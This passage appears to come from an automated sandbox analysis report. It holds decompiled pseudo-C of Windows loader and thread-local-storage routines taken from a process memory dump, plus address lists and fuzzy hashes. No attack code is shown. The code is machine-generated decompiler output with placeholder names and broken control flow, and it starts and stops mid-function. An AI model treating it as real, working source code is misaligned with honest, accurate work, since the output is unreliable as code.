														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04606600(0x46e52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04607926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x46eb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0467E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x46e8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x46eb218; // 0x0
														asm("ror edi, cl");
														 *0x46eb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04612280(_t250, 0x46e84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04633898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0460FFB0(_t293, _t353, 0x46e84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E046337F5(_t353, 0);
																}
																E04630413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04629B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E046202D6(_t174);
																}
																L046177F0( *0x46e7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0462C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0460EC7F(_t353);
										L046219B8(_t287, 0, _t353, 0);
										_t200 = E045FF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0463B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x46eb2f8; // 0xa50000
									if((_t206 |  *0x46eb2fc) == 0 || ( *0x46eb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x46eb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E046A6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E046A6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0460E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0460EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04639730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0460E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04608F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04633C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0460d5f2
0x0460d5f5
0x0460d5f5
0x0460d5fd
0x0460d600
0x0460d60a
0x0460d60d
0x0460d617
0x0460d61d
0x0460d627
0x0460d62e
0x0460d911
0x0460d913
0x00000000
0x0460d919
0x0460d919
0x0460d919
0x0460d634
0x0460d634
0x0460d634
0x0460d634
0x0460d640
0x0460d8bf
0x00000000
0x0460d646
0x0460d646
0x0460d64d
0x0460d652
0x0465b2fc
0x0465b2fc
0x0465b302
0x0465b33b
0x0465b341
0x00000000
0x0465b304
0x0465b304
0x0465b319
0x0465b31e
0x0465b324
0x0465b326
0x0465b332
0x0465b347
0x0465b34c
0x0465b351
0x0465b35a
0x00000000
0x0465b328
0x0465b328
0x00000000
0x0465b328
0x0465b326
0x0460d658
0x0460d658
0x0460d65b
0x0460d665
0x00000000
0x0460d66b
0x0460d66b
0x0460d66b
0x0460d66b
0x0460d66d
0x0460d672
0x0460d67a
0x00000000
0x00000000
0x0460d680
0x0460d686
0x0460d8ce
0x0460d8d4
0x0460d8dd
0x0460d8e0
0x0460d68c
0x0460d691
0x0460d69d
0x0460d6a2
0x0460d6a7
0x0460d6b0
0x0460d6b5
0x0460d6e0
0x0460d6b7
0x0460d6b7
0x0460d6b9
0x0460d6b9
0x0460d6bb
0x0460d6bd
0x0460d6ce
0x0460d6d0
0x0460d6d2
0x0465b363
0x0465b365
0x00000000
0x0465b36b
0x00000000
0x0465b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0460d6bf
0x0460d6bf
0x0460d6e5
0x0460d6e7
0x0460d6e9
0x0460d6ec
0x0460d6ec
0x0460d6ef
0x0460d6f5
0x0460d6f9
0x0460d6fb
0x0460d6fd
0x0460d701
0x0460d703
0x0460d70a
0x0460d70a
0x0460d701
0x0460d710
0x0460d710
0x0460d6c1
0x0460d6c1
0x0460d6c6
0x0465b36d
0x0465b36f
0x00000000
0x0465b375
0x0465b375
0x0465b375
0x00000000
0x0465b375
0x00000000
0x0460d6cc
0x0460d6d8
0x0460d6d8
0x0460d6d8
0x00000000
0x0460d6c6
0x0460d6bf
0x00000000
0x0460d6da
0x0460d6da
0x0460d716
0x0460d71b
0x0460d720
0x0460d726
0x0460d726
0x0460d72d
0x00000000
0x0460d733
0x0460d739
0x0460d742
0x0460d750
0x0460d758
0x0460d764
0x0460d776
0x0460d77a
0x0460d783
0x0460d928
0x0460d92c
0x0460d93d
0x0460d944
0x0460d94f
0x0460d954
0x0460d956
0x0460d95f
0x0460d961
0x0460d973
0x0460d973
0x0460d956
0x0460d944
0x0460d92c
0x0460d78b
0x0465b394
0x0460d791
0x0460d798
0x0465b3a3
0x0465b3bb
0x0465b3bb
0x0460d7a5
0x0460d866
0x0460d870
0x0460d884
0x0460d892
0x0460d898
0x0460d89e
0x0460d8a0
0x0460d8a6
0x0460d8ac
0x0460d8ae
0x0460d8b4
0x0460d8b4
0x0460d8ae
0x0460d7a5
0x0460d78b
0x0460d7b1
0x0465b3c5
0x0465b3c5
0x0460d7c3
0x0460d7ca
0x0460d7e5
0x0460d7eb
0x0460d8eb
0x0460d8ed
0x00000000
0x0460d8f3
0x0460d8f3
0x0460d8f3
0x00000000
0x0460d8ed
0x0460d7cc
0x0460d7cc
0x0460d7d2
0x00000000
0x0460d7d4
0x0460d7d4
0x0460d7d7
0x0460d7df
0x0465b3d4
0x0465b3d9
0x0465b3dc
0x0465b3dc
0x0465b3df
0x0465b3e2
0x0465b468
0x0465b46d
0x0465b46f
0x0465b46f
0x0465b475
0x0460d8f8
0x0460d8f9
0x0460d8fd
0x0465b3e8
0x0465b3e8
0x0465b3eb
0x0465b3ed
0x00000000
0x0465b3ef
0x0465b3ef
0x0465b3f1
0x0465b3f4
0x0465b3fe
0x0465b404
0x0465b409
0x0465b40e
0x0465b410
0x0465b410
0x0465b414
0x0465b414
0x0465b41b
0x0465b420
0x0465b423
0x0465b425
0x0465b427
0x0465b42a
0x0465b42d
0x0465b42d
0x0465b42a
0x0465b432
0x0465b436
0x0465b438
0x0465b43b
0x0465b43b
0x0465b449
0x0465b44e
0x0465b454
0x0465b458
0x0465b458
0x0465b45d
0x00000000
0x0465b45d
0x0465b3ed
0x00000000
0x00000000
0x00000000
0x0460d7df
0x0460d7d2
0x0460d7ca
0x0465b37c
0x0465b37e
0x0465b385
0x0465b38a
0x00000000
0x0465b38a
0x0460d742
0x0460d7f1
0x0460d7f8
0x0465b49b
0x0465b49b
0x0460d800
0x0460d837
0x0460d843
0x0460d845
0x0460d847
0x0460d84a
0x0460d84b
0x0460d84e
0x0460d857
0x0460d802
0x0460d802
0x0460d80d
0x00000000
0x0460d818
0x0460d818
0x0460d824
0x0460d831
0x0465b4a5
0x0465b4ab
0x0465b4b3
0x0465b4b8
0x0465b4bb
0x00000000
0x0465b4c1
0x0465b4c1
0x0465b4c8
0x00000000
0x0465b4ce
0x0465b4d4
0x0465b4e1
0x0465b4e3
0x0465b4e5
0x00000000
0x0465b4eb
0x0465b4f0
0x0465b4f2
0x0460dac9
0x0460dacc
0x0460dacf
0x0460dad1
0x0460dd78
0x0460dd78
0x0460dcf2
0x00000000
0x0460dad7
0x0460dad9
0x0460dadb
0x00000000
0x00000000
0x0460dae1
0x0460dae1
0x0460dae4
0x0460dae6
0x0465b4f9
0x0465b4f9
0x0465b500
0x0460daec
0x0460daec
0x0460daf5
0x0460daf8
0x0460dafb
0x0460db03
0x0460db11
0x0460db16
0x0460db19
0x0460db1b
0x0465b52c
0x0465b531
0x0465b534
0x0460db21
0x0460db21
0x0460db24
0x0460dcd9
0x0460dce2
0x0460dce5
0x0460dd6a
0x0460dd6d
0x00000000
0x0460dd73
0x0465b51a
0x0465b51c
0x0465b51f
0x0465b524
0x00000000
0x0465b524
0x0460dce7
0x0460dce7
0x0460dce7
0x00000000
0x0460dce7
0x00000000
0x0460db2a
0x0460db2c
0x0460db31
0x0460db33
0x0460db36
0x0460db39
0x0460db3b
0x0460db66
0x0460db66
0x0460db3d
0x0460db3d
0x0460db3e
0x0460db46
0x0460db47
0x0460db49
0x0460db4c
0x0460db53
0x0460db55
0x0460db58
0x0460db5a
0x0465b50a
0x0465b50f
0x0465b512
0x0460db60
0x0460db60
0x0460db63
0x0460db63
0x00000000
0x0460db63
0x0460db5a
0x0460db3b
0x0460db24
0x0460db69
0x0460db69
0x0460db6c
0x0460db6f
0x0460db74
0x0465b557
0x0465b557
0x0465b55e
0x0460db7a
0x0460db7c
0x0460db7f
0x0460db82
0x0460db85
0x00000000
0x0460db8b
0x0460db8b
0x0460db8d
0x0460db9b
0x0460db9b
0x0460db9d
0x0460dba0
0x0460dba2
0x0460dba4
0x0460dba7
0x0460dba9
0x0460dbae
0x0460dbae
0x0460dbb1
0x0460dbb4
0x0460dbb4
0x0460dbb7
0x0460dbba
0x0460dcd2
0x0460dcd4
0x00000000
0x0460dbc0
0x0460dbc0
0x0460dbd2
0x0460dbd7
0x0460dbda
0x0460dbdd
0x0460dbdf
0x00000000
0x0460dbe5
0x0460dbe5
0x0460dbee
0x0460dbf1
0x0465b541
0x0465b544
0x00000000
0x0465b546
0x0465b546
0x00000000
0x0465b546
0x0460dbf7
0x0460dbf7
0x0460dbfd
0x0460dbfd
0x0460dbff
0x0460dc0b
0x0460dc15
0x0460dc1b
0x0460dc1d
0x0460dc21
0x0460dc21
0x0460dc23
0x0460dc23
0x0460dc26
0x0460dc29
0x0460dc2b
0x00000000
0x00000000
0x0460dc31
0x0460dc34
0x0460dc36
0x0460dcbf
0x0460dcbf
0x0460dcc2
0x00000000
0x0460dc3c
0x0460dc41
0x0460dc43
0x00000000
0x0460dc45
0x0460dc45
0x0460dc47
0x00000000
0x0460dc4d
0x0460dc4d
0x0460dc50
0x0460dc52
0x0460dc55
0x0460dcfa
0x0460dcfe
0x0460dd08
0x0460dd0a
0x0460dd0c
0x00000000
0x0460dd12
0x0460dd15
0x0460dd2d
0x0460dd2f
0x0460dd32
0x0460dd35
0x00000000
0x0460dd35
0x0460dc5b
0x0460dc5b
0x0460dc5e
0x0460dc61
0x0460dc64
0x0460dc67
0x0460dc67
0x0460dc6a
0x0460dc6c
0x0460dc8e
0x0460dc8e
0x0460dc91
0x0460dc93
0x0460dcce
0x0460dcce
0x0460dc95
0x0460dc9c
0x0460dc6e
0x0460dc72
0x0460dc75
0x0460dc77
0x0460dc79
0x0465b551
0x0465b551
0x00000000
0x0460dc7f
0x0460dc7f
0x0460dc81
0x00000000
0x0460dc83
0x0460dc86
0x0460dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0460dc88
0x0460dc81
0x0460dc79
0x0460dc6c
0x0460dc55
0x0460dc47
0x0460dc43
0x00000000
0x0460dc36
0x0460dc23
0x00000000
0x0460dbff
0x0460dbf1
0x0460dbdf
0x0460db8f
0x0460db92
0x0460db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0460db95
0x0460db8d
0x0460db85
0x0460db74
0x0460dc9f
0x0460dca2
0x0460dcb0
0x0460dcb0
0x0460dad1
0x0465b4e5
0x0465b4c8
0x00000000
0x00000000
0x00000000
0x0460d831
0x0460d80d
0x00000000
0x0460d800
0x0465b47f
0x0465b485
0x00000000
0x0465b485
0x0460d665
0x0460d652
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58698e6088ea4996b87d1eb7f7b5c039d9842022e3cad665a43c5274e8f78154
Instruction ID: 1340fc72559c96afa6aaec51a8b85b367bcb657df65fcc4af7096166caf5b86e
Opcode Fuzzy Hash: 58698e6088ea4996b87d1eb7f7b5c039d9842022e3cad665a43c5274e8f78154
Instruction Fuzzy Hash: B4E19D30B003598FEB38CF64C844B6AB7A1AF95708F0482A9D909AB390F774BD81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0460849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0460849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x46cf9c0);
				E0464D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x46e7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0460CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04612280( *[fs:0x30], 0x46e8550);
						_t139 =  *0x46e7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0462F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0460FFB0(_t193, _t235, 0x46e8550);
								L5:
								return E0464D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E045F1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x46e7b9c; // 0x0
							_t235 = L04614620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x46e7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0462A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0460FFB0(_t193, _t235, 0x46e8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L046177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L046177F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x46e7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x46e7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E046337C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x46e7b9c; // 0x0
									_t214 = L04614620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E046337F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x46e7b10 =  *0x46e7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x46e7b04 =  *0x46e7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L046177F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L046177F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x46e7b08 =  *0x46e7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E046357C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0463F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L046177F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0462A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L046177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
